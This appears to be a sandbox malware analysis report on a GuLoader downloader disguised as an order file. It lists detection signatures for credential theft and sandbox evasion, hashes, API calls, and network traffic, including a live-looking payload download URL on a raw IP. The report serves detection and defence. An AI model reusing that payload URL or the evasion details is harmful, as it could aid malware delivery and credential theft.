Edit tour

Windows Analysis Report
Order 00293884800595.bat.exe

Overview

General Information

Sample name:	Order 00293884800595.bat.exe
Analysis ID:	1465164
MD5:	efd3bf2442d368363512548564a51050
SHA1:	ca5a3f2750542ea7d6b86f108eb6bff4095f4b16
SHA256:	f321c2bed7f29e767bbbf1fb11f6fd64e41e5fe45b3fef084198583a20f9533b
Infos:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Initial sample is a PE file and has a suspicious name

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64native

Order 00293884800595.bat.exe (PID: 9012 cmdline: "C:\Users\user\Desktop\Order 00293884800595.bat.exe" MD5: EFD3BF2442D368363512548564A51050)

Order 00293884800595.bat.exe (PID: 8160 cmdline: "C:\Users\user\Desktop\Order 00293884800595.bat.exe" MD5: EFD3BF2442D368363512548564A51050)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.1807122448137.0000000033EF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.1802216811117.0000000005184000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Order 00293884800595.bat.exe PID: 9012	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security
Process Memory Space: Order 00293884800595.bat.exe PID: 8160	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Order 00293884800595.bat.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://109.248.151.29/DttVKmqMztLpGMCsim17.bin

Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: Order 00293884800595.bat.exe	ReversingLabs: Detection: 13%
Source: Order 00293884800595.bat.exe	Virustotal: Detection: 20%			Perma Link

Source: Order 00293884800595.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.30:54358 version: TLS 1.2

Source: Order 00293884800595.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 5_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	5_2_00405A4F
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 5_2_00406620 FindFirstFileA,FindClose,	5_2_00406620
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 5_2_004027CF FindFirstFileA,	5_2_004027CF
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_00405A4F GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	8_2_00405A4F
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_00406620 FindFirstFileA,FindClose,	8_2_00406620
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_004027CF FindFirstFileA,	8_2_004027CF

Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View	IP Address: 172.67.74.152 172.67.74.152

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /DttVKmqMztLpGMCsim17.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.29Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29
Source: unknown	TCP traffic detected without corresponding DNS query: 109.248.151.29

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /DttVKmqMztLpGMCsim17.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 109.248.151.29Cache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: api.ipify.org

Source: Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003858000.00000004.00000020.00020000.00000000.sdmp, Order 00293884800595.bat.exe, 00000008.00000002.1807111990869.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://109.248.151.29/DttVKmqMztLpGMCsim17.bin
Source: Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.0000000003858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://109.248.151.29/DttVKmqMztLpGMCsim17.binu
Source: Order 00293884800595.bat.exe, 00000008.00000003.1802245749863.00000000364DE000.00000004.00000020.00020000.00000000.sdmp, Order 00293884800595.bat.exe, 00000008.00000002.1807124427166.00000000364EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Order 00293884800595.bat.exe, 00000008.00000003.1802245749863.00000000364DE000.00000004.00000020.00020000.00000000.sdmp, Order 00293884800595.bat.exe, 00000008.00000002.1807124427166.00000000364EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Order 00293884800595.bat.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Order 00293884800595.bat.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Order 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Order 00293884800595.bat.exe	String found in binary or memory: http://www.skinstudio.netG
Source: Order 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: Order 00293884800595.bat.exe, 00000008.00000002.1807110814843.00000000038DC000.00000004.00000020.00020000.00000000.sdmp, Order 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: Order 00293884800595.bat.exe, 00000008.00000002.1807122448137.0000000033EA1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 54358
Source: unknown	Network traffic detected: HTTP traffic on port 54358 -> 443

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.11.30:54358 version: TLS 1.2

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Code function: 5_2_0040550F GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

5_2_0040550F

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Order 00293884800595.bat.exe

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 5_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		5_2_004033D8
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		8_2_004033D8

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 5_2_004072D1	5_2_004072D1
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 5_2_00406AFA	5_2_00406AFA
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 5_2_6CA51B28	5_2_6CA51B28
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_004072D1	8_2_004072D1
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_00406AFA	8_2_00406AFA
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_001580B4	8_2_001580B4
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_001538C8	8_2_001538C8
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_00158C98	8_2_00158C98
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_001544E0	8_2_001544E0
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_0015F500	8_2_0015F500
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_0015D08F	8_2_0015D08F
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_0015C100	8_2_0015C100
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_00153C10	8_2_00153C10
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_0015E718	8_2_0015E718
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_35FB7160	8_2_35FB7160
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_35FB24F0	8_2_35FB24F0
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_35FB3C88	8_2_35FB3C88
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_35FB1B38	8_2_35FB1B38
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_35FB35A0	8_2_35FB35A0
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_35FBA2D8	8_2_35FBA2D8

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Code function: String function: 00402C5E appears 52 times

Source: Order 00293884800595.bat.exe, 00000005.00000002.1802214876556.0000000000443000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs Order 00293884800595.bat.exe
Source: Order 00293884800595.bat.exe, 00000008.00000002.1807104958008.0000000000443000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs Order 00293884800595.bat.exe
Source: Order 00293884800595.bat.exe	Binary or memory string: OriginalFilenamedissever.exeDVarFileInfo$ vs Order 00293884800595.bat.exe

Source: Order 00293884800595.bat.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/17@1/2

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 5_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		5_2_004033D8
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Code function: 8_2_004033D8 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,wsprintfA,GetFileAttributesA,DeleteFileA,SetCurrentDirectoryA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		8_2_004033D8

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Code function: 5_2_004047BF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

5_2_004047BF

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Code function: 5_2_00402198 CoCreateInstance,MultiByteToWideChar,

5_2_00402198

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\semes

Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

File created: C:\Users\user\AppData\Local\Temp\nsh4D83.tmp

Jump to behavior

Source: Order 00293884800595.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Order 00293884800595.bat.exe	ReversingLabs: Detection: 13%
Source: Order 00293884800595.bat.exe	Virustotal: Detection: 20%

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

File read: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Order 00293884800595.bat.exe "C:\Users\user\Desktop\Order 00293884800595.bat.exe"
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process created: C:\Users\user\Desktop\Order 00293884800595.bat.exe "C:\Users\user\Desktop\Order 00293884800595.bat.exe"
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Process created: C:\Users\user\Desktop\Order 00293884800595.bat.exe "C:\Users\user\Desktop\Order 00293884800595.bat.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

File written: C:\Users\user\AppData\Local\Temp\tmc.ini

Jump to behavior

Source: C:\Users\user\Desktop\Order 00293884800595.bat.exe

